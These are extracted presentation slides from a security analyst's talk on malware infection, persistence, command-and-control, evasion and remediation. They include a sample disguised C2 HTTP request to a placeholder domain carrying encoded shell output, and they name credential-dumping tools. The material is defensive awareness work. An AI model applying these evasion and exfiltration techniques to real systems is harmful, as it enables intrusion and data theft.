A few bits about MalwareA story about trojan horses and rats.

$ whoami

• Michael Hendrickx• Senior Security Analyst @ HelpAG• Vulnerability Assessments• Social Engineering • Presentations • Created new undetected* RAT for the company• Belgian

* Until now

Malware attacks: a real threat

• Malware have caused a lot of damage• Many names: RAT’s, virus, Trojan,

rootkit, ransomware, …• Examples: Cryptolocker, Zeus,

BlackEnergy, …

• Targets differentplatforms:• Browsers• Smartphones• PC’s

Malware attacks: stages

• Malware attacks comes in 2 stages

Infection

Exploited bugs, phishing, waterhole attacks, USB, unattended terminal, …

Persistence

AV evasion, persistence, looting, CNC connectivity,

lateral movement

“you’re in trouble”

Malware attacks: infection

• Stage 1: modes of Infection

Exploited Software Bugs

(Spear) phishing

Waterhole attack

Malicious USB

Malware attacks: infection

• Exploited software bugs• Attacker hacks into vulnerable service• Could be anything:• SQL injection on website leads to code execution• Poorly implemented upload functionality• Unpatched server software• Man in the Middle• Weak passwords• …

Malware attacks: infection

• Spear phishing• Very specific message to single or very few victims• Holds malicious payload• Macro, PDF, renamed files,

trojaned archives, …• Or, links to malicious file:• Needs to be downloaded, won’t

get caught by your AV.

Malware attacks: infection

• Waterhole attack• Indirect targeted attack• Attacker compromises sites that the victim probably visits.• Exploits outdated browser or plugins• Forces install of malware

“your flash player is outdated”“you should update Java”

Malware attacks: infection

• Evil USB dongle• USB peripheral can be anything• USB hard drive / dongle• Keyboard, WIFI / network adapter,

Microphone, …• Hub with any of the above• Example: USB rubber ducky• Looks like dongle, is a keyboard• Types 1000 words per minute• Is only 30 USD

Malware attacks: stages

• On to stage 2:

Infection

Exploited bugs, phishing, waterhole attacks, USB, unattended terminal, …

Persistence

AV evasion, persistence, looting, CNC connectivity,

lateral movement

Malware attacks: persistence

• Stage 2: Persistence• Execution persistence• Ensure that our malware keeps on running• CnC Connectivity• Listen for commands• AV Evasion / Hiding• To prevent malware from being detected, removed• Lateral movement• Infect more machines

Malware attacks: Execution persistence

• Ensure malware keeps on running• Startup folder• Registry keys• Automatic Services• Browser plugins / helper objects• You’re re-infected whenever the browser is

opened• Infected document templates• Every time a word/ppt/excel file is opened or created, you’re re-infected.

Use Microsoft’s Autoruns to see what processes start upon startup. (https://technet.microsoft.com/en-us/sysinternals/bb963902.aspx)

Malware attacks: CnC connectivity

• Direct traffic• Probably (hopefully) detected and blocked

• HTTP Tunnel• May get detected by L7 firewalls• “deep packet inspection”, pretty shallow

• HTTPS• Difficult to see what’s happening, unless MITM.

• DNS Tunneling• Usually gets “proxied” to target DNS server• Do you monitor anomalies?

• Peer to peer WIFI network

Hi, I’m an ad-hoc wifi network

Up to 10 – 20 meters

Malware attacks: hagrat CnC

• Encode / Encrypt / Obfuscate traffic

POST /css/cc.aspx HTTP/1.1Accept: text/html;q=0.8,application/xml,*/*Accept-Language: en-gb;q=0.8,enContent-Type: application/x-www-form-urlencodedCookie: ASPSESSION=laer8sp2miqisG0n2Ms1efjlj64; path=/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)Host: www.thisisafakedomain.comContent-Length: 277Connection: Keep-Alive

__VIEWSTATE=MTpNaWNyb3NvZnQgV2luZG93cyBbVmVyc2lvbiA2LjEuNzYwMV0NCkNvcHlyaWdodCAoYykgMjAwOSBNaWNyb3NvZnQgQ29ycG9yYXRpb24uICBBbGwgcmlnaHRzIHJlc2VydmVkLg0KDQpDOlxVc2Vyc1xoZW5kcmlja3hcb3duQ2xvdWQ+ZGlyIGM6Lw0KSW52YWxpZCBzd2l0Y2ggLSAiIi4NCg0KQzpcVXNlcnNcaGVuZHJpY2t4XG93bkNsb3VkPg;;.

1:Microsoft Windows [Version 6.1.7601]Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\hendrickx\ownCloud>dir c:/Invalid switch - "".

C:\Users\hendrickx\ownCloud>

Malware attacks: hiding

• Hiding• Download multiple stages

Dropper

Malicious Payload

(Real Virus)

Infect victim

Can I reach the Internet?

Does payload get detected?

Malware attacks: hiding

• Multi stage download ensures correct victim

Malicious Payload

(Real Virus)

Infect victim

Can I reach the Internet?

Dropper

Innocent Payload

This is not the IP / Company / country I’m targeting

Cool, I’ll install it

Bingo!

Malware attacks: lateral movement

• Exfiltration of information• Documents (%userprofile%\documents)• Passwords (mimikatz, Lazagne)• Browser history• Emails, files, …

• Recon / Infect the network• Ping other machines• File shares• (Sharepoint) portals

Remediation

• Human factor: don’t get infected• Social Engineering exercises• Awareness• Alerting IT security (“Support, I think I did

something wrong”)

• Technical factor: prevent, detect, destroy• Tight controls on end points• Monitor inbound programs (attachments, downloads, …)• Monitor network usage • DNS Anomalies, unidentified protocols, …• Regular scanning with AV, IOC detectors, …• Such as Loki: (https://github.com/Neo23x0/Loki)

Thank you!

Questions?

Don’t accept any USB dongles from me!

CONTACT US | WWW.HELPAG.COM | INFO@HELPAG.COM DUBAI, UAEARJAAN OFFICE TOWER, OFFICE 1201 / 1208, PO BOX 500741T +971 4 440 5666F +971 4 363 6742

ABU DHABI, UAESALAM HQ BLDG, BLOCK 6, EAST 1-16, OFFICE 503, PO BOX 37195T +971 2 644 3398F +971 2 639 1155

DOHA, QATARAL DAFNA – PALM TOWEROFFICE 4803, WEST BAY, P.O. BOX 31316T +974 4432 8067 F +974 4432 8069